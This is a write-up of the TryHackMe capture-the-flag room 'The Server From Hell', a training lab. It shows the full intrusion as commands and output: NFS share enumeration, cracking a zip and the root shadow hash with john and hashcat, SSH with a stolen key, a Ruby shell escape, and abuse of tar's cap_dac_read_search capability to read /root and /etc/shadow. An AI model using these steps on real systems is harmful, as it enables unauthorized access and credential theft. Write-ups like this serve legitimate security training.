The Server From Hell TryHackMe Write Up

6 minute read

2

The Server From Hell is an medium rated room in TryHackMe by DeadPackets. With the hints from different nmap scans, we found a backup.zip file on a nfs share which was password protected and was cracked using john which had private key for a user hades. The backup also had the hint for the port where SSH was running and we login on the box as user hades. On the box linux capabilities on the /bin/tar binary was exploited to get a root shell on the box.

Task 1 - Hacking the server
Start at port 1337 and enumerate your way. Good luck.

Port 1337

1 We get a invalid response. Lets analyse the request in the burp.

On Burp

Request

GET / HTTP/1.1
Host: 10.10.105.19:1337
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ne;q=0.8
Connection: close

Response

Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the ports

Scanning top 100 ports

[email protected]:~/Documents/tryhackme/theserverfromhell$ nmap -p1-100 10.10.105.19 --script banner -oN top100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-03 22:00 +0545                       
Nmap scan report for 10.10.105.19                                                       
Host is up (0.33s latency).                                                             
                                                                                        
PORT    STATE SERVICE                                                                   
1/tcp   open  tcpmux                                                                    
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
|_00                                                                                    
2/tcp   open  compressnet                                                               
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
|_00                                                                                    
3/tcp   open  compressnet                                                               
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
|_00                                                                                    
4/tcp   open  unknown                                                                   
| banner: 550 12345 00000000000000000000000000000000000000000000000000000               
|_00                                                                                    
5/tcp   open  rje                                                                       
| banner: 550 12345 00000000000000000000000000000000000000000000000000000   
.....
.....
.....
|_banner: \x8D000\x8D000\x100\x81\x89\x02\x81\x810w\x02\x03\x010\x010
95/tcp  open  supdup
| banner: <boinc_gui_rpc_reply>\x0A<major_version>0/major_version>\x0A<mi
|_nor_version>5/minor_version>\x0A<release>6/release>
96/tcp  open  dixie
| banner: HTTP/1.0 502 Bad Gateway\x0D\x0AProxy-Connection: close\x0D\x0A
|_Content-type: text/html; charset=us-ascii\x0D\x0A\x0D\x0A<html><head...
97/tcp  open  swift-rvf
|_banner: HTTP/1.0 204 j\x0D\x0AServer: ATEN HTTP Server(V46915)
98/tcp  open  linuxconf
|_banner: SIP/2.0 ------
99/tcp  open  metagram
| banner: E000\x83SFATAL0C0A0000Munsupported frontend protocol 3923.19778
|_: server supports 1.0 to 3.00Fpostmaster.c0L25040RProcessStartupPack...
100/tcp open  newacct
|_banner: 220 Personal FTP Server ready

Looks like there is firewall in place, which is showing all the ports as open. And another interesting things that I found here is the number 12345 which is repeating quite a lot on the banner. So thinking that as a hint, I connected to that port.

Port 12345

[email protected]:~/Documents/tryhackme/theserverfromhell$ nc 10.10.105.19 12345
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scan

Enumerating nfs

Listing exports

[email protected]:~/Documents/tryhackme/theserverfromhell$ showmount -e 10.10.105.19
Export list for 10.10.105.19:
/home/nfs *

Mounting the share

[email protected]:~/Documents/tryhackme/theserverfromhell$ mkdir mnt
[email protected]:~/Documents/tryhackme/theserverfromhell$ sudo mount -t nfs 10.10.105.19:/home/nfs mnt/
[email protected]:~/Documents/tryhackme/theserverfromhell/mnt$ ls
backup.zip
[email protected]:~/Documents/tryhackme/theserverfromhell/mnt$ cp backup.zip ..

Extracting the zip’s content

[email protected]:~/Documents/tryhackme/theserverfromhell/mnt$ cd ..
[email protected]:~/Documents/tryhackme/theserverfromhell$ unzip backup.zip 
Archive:  backup.zip
   creating: home/hades/.ssh/
[backup.zip] home/hades/.ssh/id_rsa password:

But the zip is password protected. Lets try to crack the zip password using john.

John to crack zip’s password

[email protected]:~/Documents/tryhackme/theserverfromhell$ locate zip2john
/home/local/Documents/tryhackme/koth/carnage/zip2john

I had already downloaded zip2john while playing koth on thm. zip2john is already present on most pentesting distros. If you do not have zip2john on you device, you can download it from github.

Creating hash using zip2john

[email protected]:~/Documents/tryhackme/theserverfromhell$ /home/local/Documents/tryhackme/koth/carnage/zip2john backup.zip 2>/dev/null | tee backup.hash 
backup.zip:$pkzip2$3*2*1*0*8*24*1c4c*b16d*7d8849d53ca2d690df91b5f8ff302e0eae9c13c7fbb169b6d935abdfef8c00e339f84c09*1*0*8*24*6f72*b16d*7168a30d9a64dc6df0956c675b62ff980dbd4f16fe022b1abb1c75e1943c97e47bbdc5f5*2*0*16*a*f51a7381*8e5*52*0*16*f51a*b16d*5050fa8c08f92051a2cad9941e8a8f4522a8c5dbfa32*$/pkzip2$::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa:backup.zip

Cracking the password

[email protected]:~/Documents/tryhackme/theserverfromhell$ john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
[email protected]:~/Documents/tryhackme/theserverfromhell$ john --show backup.hash 
backup.zip:zxcvbnm::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa:backup.zip

1 password hash cracked, 0 left

Password can be easily cracked with usual rockyou.txt wordlist.

Extracting the contents of backup.zip

[email protected]:~/Documents/tryhackme/theserverfromhell$ unzip backup.zip && rm backup.zip 
Archive:  backup.zip
[backup.zip] home/hades/.ssh/id_rsa password: 
  inflating: home/hades/.ssh/id_rsa  
 extracting: home/hades/.ssh/hint.txt  
  inflating: home/hades/.ssh/authorized_keys  
 extracting: home/hades/.ssh/flag.txt  
  inflating: home/hades/.ssh/id_rsa.pub 

We get some interesting files. The most interesting file is id_rsa which is the private key for user hades.

Content of flag.txt

[email protected]:~/Documents/tryhackme/theserverfromhell$ cd home/hades/.ssh/
[email protected]:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ ls
authorized_keys  flag.txt  hint.txt  id_rsa  id_rsa.pub
[email protected]:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ cat flag.txt 
thm{h0p3_y0u*****************w4ll}

Since we have the private key of user hades, lets try to login using the key.

[email protected]:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ ssh -i id_rsa [email protected]
kex_exchange_identification: read: Connection reset by peer

But looks like the ssh service is not running on port 22.

Content of hint.txt

[email protected]:~/Documents/tryhackme/theserverfromhell/home/hades/.ssh$ cat hint.txt 
2500-4500

From the hint, looks like the ssh service is somewhere in between port 2500-4500.

Port Scan

[email protected]:~/Documents/tryhackme/theserverfromhell$ nmap -p2500-4500 --script=banner --min-rate 10000 -oN nmap/port2500-45000 10.10.105.19

I saved the output on the filename port2500-45000 so that I can manipulate the result easily.

Finding the port running SSH service

[email protected]:~/Documents/tryhackme/theserverfromhell$ cat nmap/port2500-45000 | grep -i openssh -B3
2632/tcp open  irdg-post
|_banner: \x01\x01
2633/tcp open  interintelli
|_banner: SSH-1017896-OpenSSH_Vwd .
--
| banner: 0077ERR \x0A  Your Git client has made an invalid request:\x0A 
|_ GET / HTTP/1.0\x0D\x0A\x0D\x0A\x0A  Visit http://support.github.com...
2675/tcp open  ttc-etap
|_banner: SSH-457-OpenSSHrv]+\x0D?
--
| banner: <?xml version="1.0" encoding="ISO-8859-1"?>\x0D\x0A<!DOCTYPE ht
|_ml PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"\x0D\x0A  "http://www.w3...
3333/tcp open  dec-notes
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
--
| banner: +host=cashew version=70109 uptime=0:6917293 audio-bits=8audio-b
|_yte-order=mendian
3353/tcp open  fatpipe
|_banner: SSH-17-OpenSSH_gSYIDLY miniBSD-144243\x0D?
--
| banner: HTTP/1.1 400 Bad Request\x0D\x0AContent-Length: 85\x0D\x0AConte
|_nt-Type: text/plain\x0D\x0A\x0D\x0AThe client sent a plain HTTP requ...
3699/tcp open  kpn-icw
|_banner: SSH-8877935-OpenSSH_cjAs-pwexp0r?

And from the banner, it looks like SSH is running on port 3333.

Shell as hades

[email protected]:~/Documents/tryhackme/theserverfromhell/nfs/home/hades/.ssh$ ssh -i id_rsa [email protected] -p 3333

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Last login: Tue Nov  3 15:50:21 2020 from 10.6.31.213

 ██░ ██ ▓█████  ██▓     ██▓    
▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒    
▒██▀▀██░▒███   ▒██░    ▒██░    
░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░    
░▓█▒░██▓░▒████▒░██████▒░██████▒
 ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
 ░  ░░ ░   ░     ░ ░     ░ ░   
 ░  ░  ░   ░  ░    ░  ░    ░  ░
                               
 Welcome to hell. We hope you enjoy your stay!
 irb(main):001:0> 

This time we log in. But we get a weird shell. Looks like it is running ruby.

Getting a bash shell

 irb(main):001:0> system('/bin/bash')
[email protected]:~$

Reading User flag

[email protected]:~$ ls -la
total 28
drwxr-xr-x 3 root  root  4096 Sep 15 22:11 .
drwxr-xr-x 6 root  root  4096 Sep 15 22:11 ..
-rw-r--r-- 1 hades hades  220 Sep 15 22:11 .bash_logout
-rw-r--r-- 1 hades hades 3771 Sep 15 22:11 .bashrc
-rw-r--r-- 1 hades hades  807 Sep 15 22:11 .profile
drwx------ 2 hades hades 4096 Sep 15 22:11 .ssh
-rw-r--r-- 1 hades hades   30 Sep 15 22:11 user.txt
[email protected]:~$ cat user.txt 
thm{sh3ll_****************_1337}

I ran linpeas.sh to find out the potential privilege escalation vector and one entry of linux capability on /bin/tar caught my eye.

Linux Capabilities on /bin/tar

[email protected]:~$ getcap /bin/tar
/bin/tar = cap_dac_read_search+ep

This capability will help us to bypass file read permission checks and directory read and execute permission checks. It is well explained in this article.

Creating a tar of /root

[email protected]:/tmp$ /bin/tar -cvf root.tar /root/
/bin/tar: Removing leading `/' from member names
/root/
/root/.gnupg/
/root/.gnupg/private-keys-v1.d/
/root/.bashrc
/root/root.txt
/root/.bash_history
/root/.ssh/
/root/.ssh/authorized_keys
/root/.cache/
/root/.cache/motd.legal-displayed
/root/.profile

Extracting the root.tar archive

[email protected]:/tmp$ tar -xvf root.tar 
root/
root/.gnupg/
root/.gnupg/private-keys-v1.d/
root/.bashrc
root/root.txt
root/.bash_history
root/.ssh/
root/.ssh/authorized_keys
root/.cache/
root/.cache/motd.legal-displayed
root/.profile

Reading root flag

[email protected]:/tmp$ cat root/root.txt 
thm{w0w**********10n}

Getting a root shell

[email protected]:/tmp$ /bin/tar -cvf root.tar /etc/shadow                                                                                                                             
/bin/tar: Removing leading `/' from member names                                        
/etc/shadow
[email protected]:/tmp$ tar -xvf root.tar                                                       
etc/shadow

Root hash

[email protected]:/tmp$ cat etc/shadow | grep -i root
root:$6$gOnbjpUs$c0IEFcbrGocU26kyzzPOqzY02e7bcawNexPsEm3oENaBIw7mVz/h9dOgaDaphveFY9ScIetMiI8F/XOnTxJxi1:18520:0:99999:7:::

Cracking hash with hashcat

[email protected]:~/Documents/tryhackme/theserverfromhell$ hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...
                              
$6$gOnbjpUs$c0IEFcbrGocU26kyzzPOqzY02e7bcawNexPsEm3oENaBIw7mVz/h9dOgaDaphveFY9ScIetMiI8F/XOnTxJxi1:trustno1    

The hash is successfully cracked and now we can login on the box as root.

[email protected]:/tmp$ su -
Password: 
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)